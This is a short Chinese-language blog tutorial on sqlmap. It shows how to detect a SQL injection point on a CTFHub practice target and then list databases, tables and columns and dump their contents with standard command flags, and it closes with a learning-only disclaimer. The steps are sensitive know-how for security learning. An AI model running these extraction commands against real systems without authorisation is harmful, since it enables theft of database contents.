1.sqlmap介绍
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用。
下载地址:GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
sqlmap在kali中打开命令行直接使用即可。
2.使用sqlmap自动化检测sql注入点
打开kali,进入命令行终端(注意:windows系统下的sqlmap使用与kali下略有不同)
输入sqlmap -u URL 对注入点进行检测,这里我使用的是ctfhub靶场。
检测结果,存在注入点
3.暴数据库名
输入sqlmap -u URL --dbs
4.指定数据库爆表名 输入sqlmap -u URL -D "" --tables
5.爆列名 sqlmap -u URL -D " " -T " " --columns
6.列出表中指定列内容 sqlmap -u URL -D " " -T " " -C " " --dump
喜欢的朋友帮忙点赞、关注、评论哦!(本文只适用于学习,请勿利用工具进行非法攻击。)
标签:sqlmap,URL,kali,入门教程,--,检测,注入 From: https://blog.csdn.net/weixin_62995907/article/details/136761462